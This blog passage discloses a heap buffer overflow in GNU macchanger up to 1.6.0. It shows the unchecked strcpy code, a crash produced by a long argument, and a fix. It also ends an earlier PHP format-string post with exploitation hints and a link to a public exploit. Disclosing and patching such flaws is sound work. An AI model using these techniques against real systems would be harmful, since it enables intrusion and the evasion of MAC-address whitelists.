As long as we’re careful, an invalid format string won’t necessarily crash the application, even if it misbehaves. With a little finesse we can use the same format string bug to leak an address. Once we know the address of a string, we can patch it dynamically and then run it through again; this time for real. The challenge then becomes modifying the string without modifying its location. I’ll leave that as an exercise for the reader. :)

If you’d like to see a working exploit for this issue, mine is public on exploit-db. [4] It bypasses ASLR and NX beautifully. All the pointers and ROP gadgets are from a custom binary, so you’ll still need to put your own work in, but it’s a start. Enjoy!

[1]. https://bugs.php.net/bug.php?id=71105
[2]. https://bugs.php.net/bug.php?id=71704
[3]. https://twitter.com/i0n1c/status/664706994478161920
[4]. https://www.exploit-db.com/exploits/39645/

Sunday, April 17, 2016

GNU macchanger <= 1.6.0 Heap Buffer Overflow

I was poking around the GNU macchanger source code the other day for fun and happened across this little gem. Unfortunately modern heap-corruption protections make exploitation extremely difficult, if not impossible (to the best of my knowledge), and even then, you would only be able to gain the privileges of the current user. But what the heck, let’s dive in anyway! A little throwback to the glory days of stack smashing.

In case you aren’t aware, GNU macchanger is a simple program written in C which alters the MAC address of a given network interface. How it does this is beyond the scope of this blog-post, but it can be useful if you need to, for instance, troll sysadmins by bypassing their impenetrable MAC-address-whitelist. Let me also shout out to macchanger’s author, Alvaro Lopez, for the fantastic work. Overall, macchanger is a very useful bit of code, and I can’t thank you enough. I will be submitting a patch to resolve this issue as soon as I’m done typing here. Anyone wishing to download a copy of the code can do so at: https://ftp.gnu.org/gnu/macchanger/

The issue exists in the file netinfo.c:38-58, in the function mc_net_info_new(). Relevant code…

net_info_t *
mc_net_info_new (const char *device)
{
        net_info_t *new = (net_info_t *) malloc (sizeof(net_info_t));
 
        new->sock = socket (AF_INET, SOCK_DGRAM, 0);

        if (new->sock<0) {
                perror ("[ERROR] Socket");
                free(new);
                return NULL;
        }

        strcpy (new->dev.ifr_name, device);

        if (ioctl(new->sock, SIOCGIFHWADDR, &new->dev) < 0) {
                perror ("[ERROR] Set device name");
                free(new);
                return NULL;
        }
 
        return new;
}

I could spend the next 10 paragraphs explaining to you why strcpy()’ing arbitrary data into a fixed length character array is a bad idea, but AlephOne beat me to it back in Phrack 49 (1996). So instead let’s just take a closer look at what’s getting clobbered.

This function accepts one const char * argument called device. This value will be taken from argv[argc-1] (the last command line argument), and represents the network interface macchanger should be working with.

This function declares one local variable of type net_info_t * called new. net_info_t is a struct, defined in netinfo.h:33-36. Relevant code…

typedef struct {
        int sock;
        struct ifreq dev;
} net_info_t;

IF_NAMESIZE is previously defined as 16 on line 32 of the same file. This ultimately means that new->dev.ifr_name (which strcpy() is going to use as the copy destination) will only be 16 bytes, whereas device (our command line argument) can be arbitrarily long. And that leads to large quantities of fun. :) Relevant…

andrew@WOPR ~ % macchanger BBBBBBBBBBBBBBBB
*** buffer overflow detected ***: macchanger terminated
======= Backtrace: =========
/usr/lib/libc.so.6(+0x73f8e)[0x7f9e47940f8e]
/usr/lib/libc.so.6(__fortify_fail+0x37)[0x7f9e479c6e57]
/usr/lib/libc.so.6(+0xf7f60)[0x7f9e479c4f60]
macchanger[0x40198f]
macchanger[0x400ecc]
/usr/lib/libc.so.6(__libc_start_main+0xf0)[0x7f9e478ed000]
macchanger[0x4010e5]
======= Memory map: ========
00400000-00403000 r-xp 00000000 fe:01 2292415                            /usr/bin/macchanger
00602000-00603000 r--p 00002000 fe:01 2292415                            /usr/bin/macchanger
00603000-00604000 rw-p 00003000 fe:01 2292415                            /usr/bin/macchanger
022e8000-0238d000 rw-p 00000000 00:00 0                                  [heap]
7f9e476b7000-7f9e476cd000 r-xp 00000000 fe:01 2246088                    /usr/lib/libgcc_s.so.1
7f9e476cd000-7f9e478cc000 ---p 00016000 fe:01 2246088                    /usr/lib/libgcc_s.so.1
7f9e478cc000-7f9e478cd000 rw-p 00015000 fe:01 2246088                    /usr/lib/libgcc_s.so.1
7f9e478cd000-7f9e47a71000 r-xp 00000000 fe:01 2231574                    /usr/lib/libc-2.19.so
7f9e47a71000-7f9e47c71000 ---p 001a4000 fe:01 2231574                    /usr/lib/libc-2.19.so
7f9e47c71000-7f9e47c75000 r--p 001a4000 fe:01 2231574                    /usr/lib/libc-2.19.so
7f9e47c75000-7f9e47c77000 rw-p 001a8000 fe:01 2231574                    /usr/lib/libc-2.19.so
7f9e47c77000-7f9e47c7b000 rw-p 00000000 00:00 0
7f9e47c7b000-7f9e47c9c000 r-xp 00000000 fe:01 2231549                    /usr/lib/ld-2.19.so
7f9e47e1c000-7f9e47e64000 rw-p 00000000 00:00 0
7f9e47e9a000-7f9e47e9b000 rw-p 00000000 00:00 0
7f9e47e9b000-7f9e47e9c000 r--p 00020000 fe:01 2231549                    /usr/lib/ld-2.19.so
7f9e47e9c000-7f9e47e9d000 rw-p 00021000 fe:01 2231549                    /usr/lib/ld-2.19.so
7f9e47e9d000-7f9e47e9e000 rw-p 00000000 00:00 0
7fffa1aca000-7fffa1aeb000 rw-p 00000000 00:00 0                          [stack]
7fffa1bfc000-7fffa1bfe000 r-xp 00000000 00:00 0                          [vdso]
7fffa1bfe000-7fffa1c00000 r--p 00000000 00:00 0                          [vvar]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
[1]    5575 abort (core dumped)  macchanger BBBBBBBBBBBBBBBB
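
Sixteen B’s are enough to trip the check because strcpy() also copies the terminating NUL byte, so the copy needs 17 bytes and the buffer has 16. A tiny Python sketch of that arithmetic, using the 16-byte size quoted above (the function name is made up for illustration):

```python
IFNAMSIZ = 16  # size of ifr_name in bytes, per the text above


def fits_ifr_name(device: str) -> bool:
    """True if the name plus its terminating NUL fits in ifr_name."""
    return len(device.encode()) + 1 <= IFNAMSIZ


for name in ("eth0", "B" * 15, "B" * 16):
    print(len(name), fits_ifr_name(name))
```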

Here's the patch...

--- /tmp/macchanger-1.6.0/src/netinfo.c 2013-03-16 17:56:37.000000000 -0500
+++ /tmp/macchanger-1.6.0-patched/src/netinfo.c 2014-08-23 16:25:31.929638204 -0500
@@ -47,6 +47,12 @@
        return NULL;
    }
 
+   if (strlen(device) >= IFNAMSIZ) {
+       fprintf (stderr, "[ERROR] Device name too long\n");
+       free(new);
+       return NULL;
+   }
+
    strcpy (new->dev.ifr_name, device);
    if (ioctl(new->sock, SIOCGIFHWADDR, &new->dev) < 0) {
        perror ("[ERROR] Set device name");

Remember kids… Just say no to strcpy()